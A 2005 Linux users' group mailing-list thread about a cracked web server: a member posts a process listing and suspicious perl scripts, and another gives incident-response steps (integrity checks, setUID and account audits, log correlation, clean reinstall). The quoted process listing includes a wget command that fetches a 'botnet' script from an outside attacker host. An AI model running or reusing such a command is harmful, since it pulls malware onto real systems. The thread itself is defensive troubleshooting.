[vox-tech] lugod.org cracked?

ME dugan at passwall.com
Tue Feb 15 13:08:24 PST 2005 

2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.

You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
installed.

You will want to find all setUID scripts/apps on the system and check
/etc/password for new accounts.

It would be a good idea to track the time of the event to the files with
the earliest creations stamp. Look for any files owned by apache user or
group on the system which are not where they should be (most will be in
publicly writable spaces like /tmp /var/tmp /usr/tmp, etc)

Associate the creation time of these files with entries in your web server
logs.... you may not be able to find an error with the cirrect time if a
service/daemon faulted before it could write a log entry.

Is lugod.org running an file integrity checker?

Inspect all php files for modification and trojans that may have been left
behind.

You may have a cache of videos/music/stuff left behind too.

You don't know what other rootkits may have been used. even init could
have been trojaned. It is also possible for modules to be loaded and
hidden from listing/view.

Check everything. If that is too much work, backup to tape, clean install,
and only move files over that have been sanitized.

HTH,
-ME

ME said:
> Most common trojan/exploit is for irc relays.
>
> Guess for entry? Did you upgrade php and apache after those security holes
> were found a while back?
>
> could you send me a copy of the binary files you have found in
> /tmp/.image? (Thanks.)
>
> -ME
>
> Rod Roark said:
>> I found that something was sucking up all my bandwidth late
>> this morning.  ps -aux showed this:
>>
>> apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c
>> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
>> apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget
>> leblocks.sytes.net/botnet
>> apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep
>> abcdeee
>>
>> After killing all processes owned by apache and doing a bit
>> of checking around, I found these perl scripts in
>> /tmp/.images:
>>
>> -rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1
>>
>> They are definitely malicious.  Does anyone know what this
>> malware is?
>>
>> -- Rod
>> _______________________________________________
>> vox-tech mailing list
>> vox-tech at lists.lugod.org
>> http://lists.lugod.org/mailman/listinfo/vox-tech
>>
>>
>
> _______________________________________________
> vox-tech mailing list
> vox-tech at lists.lugod.org
> http://lists.lugod.org/mailman/listinfo/vox-tech
>
>

More information about the vox-tech mailing list